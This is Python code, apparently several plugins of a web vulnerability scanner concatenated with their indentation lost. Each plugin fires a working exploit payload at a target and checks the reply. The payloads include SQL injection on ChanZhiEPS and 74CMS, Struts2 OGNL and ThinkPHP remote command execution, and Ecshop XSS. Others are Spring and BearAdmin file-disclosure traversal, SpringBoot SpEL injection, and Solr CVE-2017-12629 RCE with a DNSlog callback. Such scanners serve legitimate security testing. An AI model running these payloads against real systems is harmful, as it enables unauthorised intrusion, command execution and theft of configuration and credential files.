scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload = "/user-edit.html"
data = "realname=aaaaaa'&email=z%40qq.com&password1=&password2=&company=&address=&zipcode=&mobile=&phone=&`admin=md5%28c%29"
payload_url = scheme + "://" + url + ":" + str(port) + payload
headers = {
'User-Agent':
RandomAgent,
'Content-Type':
'application/x-www-form-urlencoded',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
s = requests.session()
resp = s.post(payload_url,
data=data,
headers=headers,
timeout=6,
verify=False)
con = resp.text
if con.find("4a8a08f09d37b73795649038408b5f33") != -1:
Medusa = "{}存在ChanZhiEPSSQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
url, payload_url, con)
_t = VulnerabilityInfo(Medusa)
web = VulnerabilityDetails(_t.info)
web.High() # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危
WriteFile().result(str(url),
str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果
except Exception:
_ = VulnerabilityInfo('').info.get('algroup')
_l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, UnixTimestamp):
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload = "/jobs/street-search.php?sort=wage%3Edesc%27&page=1&streetid=&inforow="
payload_url = scheme + "://" + url + ":" + str(port) + payload
headers = {
'User-Agent':
RandomAgent,
'Content-Type':
'application/x-www-form-urlencoded',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
s = requests.session()
resp = s.get(payload_url, headers=headers, timeout=6, verify=False)
con = resp.text
code = resp.status_code
if code == 200 and con.find('Error') != -1 and con.find(
'ORDER BY') != -1:
Medusa = "{}存在74CMS存在SQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
url, payload_url, con)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
UnixTimestamp).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, Token, proxies=None):
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
payload = '''?debug=browser&object=(%[email protected]@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command%5B0%5D).getInputStream()))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=netstat%20-an'''
try:
payload_url = scheme + "://" + url + ":" + str(
port) + "/index.action" + payload
headers = {
'User-Agent': RandomAgent,
"Accept":
"application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*",
"Content-Type": "application/x-www-form-urlencoded"
}
resp = requests.get(payload_url,
headers=headers,
proxies=proxies,
timeout=6,
verify=False)
con = resp.text
resilt = Result(con)
if resilt == "Linux" or resilt == "NoteOS" or resilt == "Windows":
Medusa = "{} 存在Struts2远程代码执行漏洞\r\n漏洞详情:\r\n版本号:S2-Devmode\r\n返回数据:{}\r\n".format(
url, con, resilt)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url, Token).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None:
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
rm = randoms().result(20)
payload = '/mobile/user.php?act=act_register'
payload_url = scheme + "://" + url + ":" + str(port) + payload
data = 'username=networks<script>alert({})</script>&[email protected]&password=woaini&confirm_password=woaini&act=act_register&back_act='.format(
rm)
resp = requests.post(payload_url,
data=data,
headers=Headers,
timeout=6,
proxies=proxies,
verify=False)
con = resp.text
code = resp.status_code
if code == 200 and con.find(
"<script>alert({})</script>".format(rm)) != -1:
Medusa = "{}存在Ecshop跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(
url, payload_url, con)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
e) #调用写入类
def medusa(Url,RandomAgent,proxies=None,**kwargs):
proxies=Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
payload1="/foo/profiles/..%28_%29Windows/win.ini"
payload2 = "/foo/profiles/..%28_%29etc/hosts.allow"
payload3 = "/foo/profiles/%252f..%252f..%252f..%252fetc/hosts.allow"
payload4 = "/foo/profiles/%252f..%252f..%252f..%252fWindows/win.ini"
for i in [ payload1, payload2, payload3, payload4]:
try:
payload_url = scheme + "://" + url +":"+ str(port)+ i
headers = {
'User-Agent': RandomAgent,
'Accept': '*/*',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'en',
'Connection': 'close',
"Upgrade-Insecure-Requests": "1"
}
resp = requests.get(payload_url,headers=headers, proxies=proxies,timeout=6, verify=False,allow_redirects=False)
con = resp.text
code = resp.status_code
if code==200 and con.find("root:x:")!=-1 and con.find("bin:x")!=-1 and con.find("lp:x")!=-1:
Medusa = "{} 存在Spring反射文件下载漏洞(CVE-2020-5405)\r\n漏洞地址:\r\n{}\r\n返回内容:\r\n{}".format(url,payload_url,con)
_t=VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,**kwargs).Write()#传入url和扫描到的数据
WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(Url, RandomAgent, UnixTimestamp):
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload = "/admin/databack/download.html?name=../application/database.php"
payload_url = scheme + "://" + url + ":" + str(port) + payload
headers = {
'User-Agent':
RandomAgent,
'Content-Type':
'application/x-www-form-urlencoded',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
s = requests.session()
resp = s.get(payload_url, headers=headers, timeout=6, verify=False)
con = resp.text
code = resp.status_code
if code == 200 and con.find("数据库名") != -1:
Medusa = "{}存在BearAdmin任意文件下载漏洞\r\n 验证数据:\r\nUrl:{}\r\n返回内容:{}\r\n".format(
url, payload_url, con)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
UnixTimestamp).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url: str, RandomAgent: str, proxies: str = None, **kwargs) -> None:
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
headers = {
'User-Agent': RandomAgent,
"Accept-Language":
"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
}
payload = "/?payload=${new%20java.lang.String(new%20byte[]{70, 66, 66, 50, 48, 52, 65, 52, 48, 54, 49, 70, 70, 66, 68, 52, 49, 50, 56, 52, 65, 56, 52, 67, 50, 53, 56, 67, 49, 66, 70, 66})}"
payload_url = scheme + "://" + url + ":" + str(port) + payload
resp = requests.get(payload_url,
headers=headers,
proxies=proxies,
timeout=6,
verify=False)
con = resp.text
#返回结果是md5(wooyun)
if con.lower().find("fbb204a4061ffbd41284a84c258c1bfb") != -1:
Medusa = "{}存在SpringBoot框架SPEL表达式注入漏洞(CNVD-2016-04742)\r\n验证数据:\r\n返回内容:{}\r\n".format(
url, con)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
e) #调用写入类
def medusa(Url, RandomAgent, UnixTimestamp):
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload = "/index.php?s=captcha"
data = "_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id"
payload_url = scheme + "://" + url + ":" + str(port) + payload
headers = {
'User-Agent': RandomAgent,
"Accept-Language":
"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Content-Type": "application/x-www-form-urlencoded"
}
resp = requests.post(payload_url,
headers=headers,
data=data,
timeout=6,
verify=False)
con = resp.text
code = resp.status_code
if code == 200 and con.find("uid=") != -1 and con.find(
"gid=") != -1 and con.find("groups=") != -1:
Medusa = "{}存在ThinkPHP任意命令执行漏洞\r\n验证数据:\r\n漏洞位置:{}\r\n返回值:{}\r\n".format(
url, payload_url, con)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
UnixTimestamp).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(**kwargs)->None:
url=kwargs.get("Url")#获取传入的url参数
Headers=kwargs.get("Headers")#获取传入的头文件
proxies=kwargs.get("Proxies")#获取传入的代理参数
try:
payload_url=url +'/solr/admin/cores'
step1 =requests.get(payload_url,timeout=6,proxies=proxies, headers = Headers).text
data = json.loads(step1)
if 'status' in data:
name = ''
for x in data['status']:
name = x
payload = "/solr/"+name+"/config"
payload2 = "/solr/" + name + "/update"
payload_url = url + payload
payload_url2 = url + payload2
DL = Dnslog() # 初始化DNSlog
rm=randoms().result(10)
data1='''{"add-listener":{"event":"postCommit","name":"'''+rm+'''","class":"solr.RunExecutableListener","exe":"ping","dir":"/usr/bin/","args":["'''+DL.dns_host()+'''"]}}'''
data2='''[{"id":"'''+rm+'''"}]'''
Headers2 = Headers
Headers2['Accept'] ='application/json'
Headers2["Content-Type"]="application/json"
#POC没问题DNSlog有问题
#DL="p61rpm.dnslog.cn"
resp = requests.post(payload_url,data=data1,headers=Headers,proxies=proxies, timeout=6, verify=False)
resp2 = requests.post(payload_url2, data=data2, headers=Headers2, proxies=proxies,timeout=6, verify=False)
time.sleep(3)
if DL.result():
Medusa = "{}存在Solr远程代码执行漏洞(CVE-2017-12629)\r\n 验证数据:\r\n漏洞位置:{}\r\n模板返回值:{}\r\n执行结果:{}\r\n".format(url,payload_url,resp.text,resp2.text)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, resp2,**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
